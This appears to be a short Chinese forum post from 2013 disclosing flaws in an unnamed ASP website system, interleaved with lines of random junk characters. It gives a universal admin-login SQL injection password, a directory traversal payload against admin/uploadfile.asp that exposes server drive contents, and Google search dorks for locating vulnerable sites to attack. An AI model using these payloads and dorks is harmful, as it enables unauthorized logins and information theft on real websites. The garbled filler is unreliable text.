后台万能密码 'or'='or'8 m, s3 m+ k. U- H2 f4 w/ ?
+ r' D' P5 \4 ~$ L7 }
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!$ l$ ^" R( G) u/ C, v8 ?
admin/uploadfile.asp?currentFolder=/upfiles/../& B, j# e, f8 _. B) ^9 I2 ?0 Z
# a" m) i# {! Y1 W4 o) p5 u漏洞证明:
6 r7 [8 ~# k3 x/ \
9 Y1 P2 n+ Q' w7 f2 w谷歌:inurl:type.asp?id=1 新闻中心
; P3 f" @, q, _" r) p4 h或者 :inurl:download_ok.asp?
6 T: g" n0 \+ z0 o- x6 F$ i
! U% @. `# K3 @ |
发表于 2013-3-14 20:17:32
收藏
支持
反对